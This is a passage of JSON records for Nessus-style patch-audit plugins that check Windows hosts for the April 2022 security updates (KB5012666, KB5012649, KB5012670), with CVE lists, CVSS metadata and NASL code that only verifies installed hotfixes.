exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'10240',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012653])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:11", "description": "The remote Windows host is missing security update 5012666 or cumulative update 5012650. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26812, CVE-2022-26919,CVE-2022-26809,CVE-2022-26918,CVE-2022-26813, CVE-2022-26821,CVE-2022-26819,CVE-2022-26815,CVE-2022-26916, CVE-2022-26822,CVE-2022-26917,CVE-2022-26829,CVE-2022-26820, CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534, CVE-2022-24485,CVE-2022-24533,CVE-2022-26903,CVE-2022-24528, CVE-2022-21983,CVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26796, CVE-2022-26827,CVE-2022-26802,CVE-2022-26797,CVE-2022-26807, CVE-2022-26792,CVE-2022-26794,CVE-2022-26803,CVE-2022-26801, CVE-2022-26787,CVE-2022-26810,CVE-2022-26904,CVE-2022-26798, CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481, CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499, CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831,CVE-2022-24538,CVE-2022-24484,CVE-2022-26784)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24493,CVE-2022-24498,CVE-2022-24483)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012666: Windows Server 2012 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24538", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-26784", "CVE-2022-26787", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26815", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012666.NASL", "href": "https://www.tenable.com/plugins/nessus/159676", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159676);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24538\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-26784\",\n \"CVE-2022-26787\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26815\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012650\");\n script_xref(name:\"MSKB\", value:\"5012666\");\n script_xref(name:\"MSFT\", value:\"MS22-5012650\");\n script_xref(name:\"MSFT\", value:\"MS22-5012666\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012666: Windows Server 2012 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012666\nor cumulative update 5012650. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26812,\n CVE-2022-26919,CVE-2022-26809,CVE-2022-26918,CVE-2022-26813,\n CVE-2022-26821,CVE-2022-26819,CVE-2022-26815,CVE-2022-26916,\n CVE-2022-26822,CVE-2022-26917,CVE-2022-26829,CVE-2022-26820,\n CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534,\n CVE-2022-24485,CVE-2022-24533,CVE-2022-26903,CVE-2022-24528,\n CVE-2022-21983,CVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges. (CVE-2022-26796,\n CVE-2022-26827,CVE-2022-26802,CVE-2022-26797,CVE-2022-26807,\n CVE-2022-26792,CVE-2022-26794,CVE-2022-26803,CVE-2022-26801,\n CVE-2022-26787,CVE-2022-26810,CVE-2022-26904,CVE-2022-26798,\n CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481,\n CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499,\n CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915,\n CVE-2022-26831,CVE-2022-24538,CVE-2022-24484,CVE-2022-26784)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24493,CVE-2022-24498,CVE-2022-24483)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012666\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012650\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012666 or Cumulative Update 5012650\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012666',\n '5012650'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.2',\n sp:0,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012666, 5012650])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:43:38", "description": "The remote Windows host is missing security update 5012639 or cumulative update 5012639. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494, CVE-2022-24499, CVE-2022-24521, CVE-2022-24527, CVE-2022-24530, CVE-2022-24540, CVE-2022-24542, CVE-2022-24544, CVE-2022-24547, CVE-2022-24550, CVE-2022-26786, CVE-2022-26787, CVE-2022-26788, CVE-2022-26790, CVE-2022-26792, CVE-2022-26794, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803, CVE-2022-26807, CVE-2022-26808, CVE-2022-26810, CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21983, CVE-2022-22008, CVE-2022-24485, CVE-2022-24491, CVE-2022-24492, CVE-2022-24500, CVE-2022-24528, CVE-2022-24533, CVE-2022-24534, CVE-2022-24536, CVE-2022-24541, CVE-2022-26809, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26829, CVE-2022-26903, CVE-2022-26916, CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24493,CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012649: Windows 7 and Windows Server 2008 R2 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24485", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24547", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012649.NASL", "href": "https://www.tenable.com/plugins/nessus/159672", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159672);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24485\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-26787\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26815\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012626\");\n script_xref(name:\"MSKB\", value:\"5012649\");\n script_xref(name:\"MSFT\", value:\"MS22-5012626\");\n script_xref(name:\"MSFT\", value:\"MS22-5012649\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012649: Windows 7 and Windows Server 2008 R2 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012639\nor cumulative update 5012639. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494,\n CVE-2022-24499, CVE-2022-24521, CVE-2022-24527,\n CVE-2022-24530, CVE-2022-24540, CVE-2022-24542,\n CVE-2022-24544, CVE-2022-24547, CVE-2022-24550,\n CVE-2022-26786, CVE-2022-26787, CVE-2022-26788,\n CVE-2022-26790, CVE-2022-26792, CVE-2022-26794,\n CVE-2022-26796, CVE-2022-26797, CVE-2022-26798,\n CVE-2022-26801, CVE-2022-26802, CVE-2022-26803,\n CVE-2022-26807, CVE-2022-26808, CVE-2022-26810,\n CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21983,\n CVE-2022-22008, CVE-2022-24485, CVE-2022-24491,\n CVE-2022-24492, CVE-2022-24500, CVE-2022-24528,\n CVE-2022-24533, CVE-2022-24534, CVE-2022-24536,\n CVE-2022-24541, CVE-2022-26809, CVE-2022-26812,\n CVE-2022-26813, CVE-2022-26814, CVE-2022-26815,\n CVE-2022-26817, CVE-2022-26818, CVE-2022-26819,\n CVE-2022-26820, CVE-2022-26821, CVE-2022-26822,\n CVE-2022-26829, CVE-2022-26903, CVE-2022-26916,\n CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24493,CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26915,\n CVE-2022-26831)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012649\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012626\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5012649 or Cumulative Update KB5012626.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012649',\n '5012626'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.1',\n sp:1,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012649, 5012626])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:40", "description": "The remote Windows host is missing security update 5012639 or cumulative update 5012670. It is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494, CVE-2022-24499, CVE-2022-24521, CVE-2022-24527, CVE-2022-24530, CVE-2022-24540, CVE-2022-24542, CVE-2022-24544, CVE-2022-24547, CVE-2022-24550, CVE-2022-26786, CVE-2022-26787, CVE-2022-26788, CVE-2022-26790, CVE-2022-26792, CVE-2022-26794, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803, CVE-2022-26807, CVE-2022-26808, CVE-2022-26810, CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21983, CVE-2022-22008, CVE-2022-24485, CVE-2022-24491, CVE-2022-24492, CVE-2022-24500, CVE-2022-24528, CVE-2022-24533, CVE-2022-24534, CVE-2022-24536, CVE-2022-24541, CVE-2022-26809, CVE-2022-26812, CVE-2022-26813, CVE-2022-26814, CVE-2022-26815, CVE-2022-26817, CVE-2022-26818, CVE-2022-26819, CVE-2022-26820, CVE-2022-26821, CVE-2022-26822, CVE-2022-26829, CVE-2022-26903, CVE-2022-26916, CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24483, CVE-2022-24493, CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-24484, CVE-2022-24538, CVE-2022-26784, CVE-2022-26831, CVE-2022-26915)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012670: Windows Server 2012 R2 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24538", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24547", "CVE-2022-24550", "CVE-2022-26784", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26827", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012639.NASL", "href": "https://www.tenable.com/plugins/nessus/159682", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159682);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24483\",\n \"CVE-2022-24484\",\n \"CVE-2022-24485\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24538\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24547\",\n \"CVE-2022-24550\",\n \"CVE-2022-26784\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26814\",\n \"CVE-2022-26815\",\n \"CVE-2022-26817\",\n \"CVE-2022-26818\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26827\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012639\");\n script_xref(name:\"MSKB\", value:\"5012670\");\n script_xref(name:\"MSFT\", value:\"MS22-5012639\");\n script_xref(name:\"MSFT\", value:\"MS22-5012670\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012670: Windows Server 2012 R2 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is 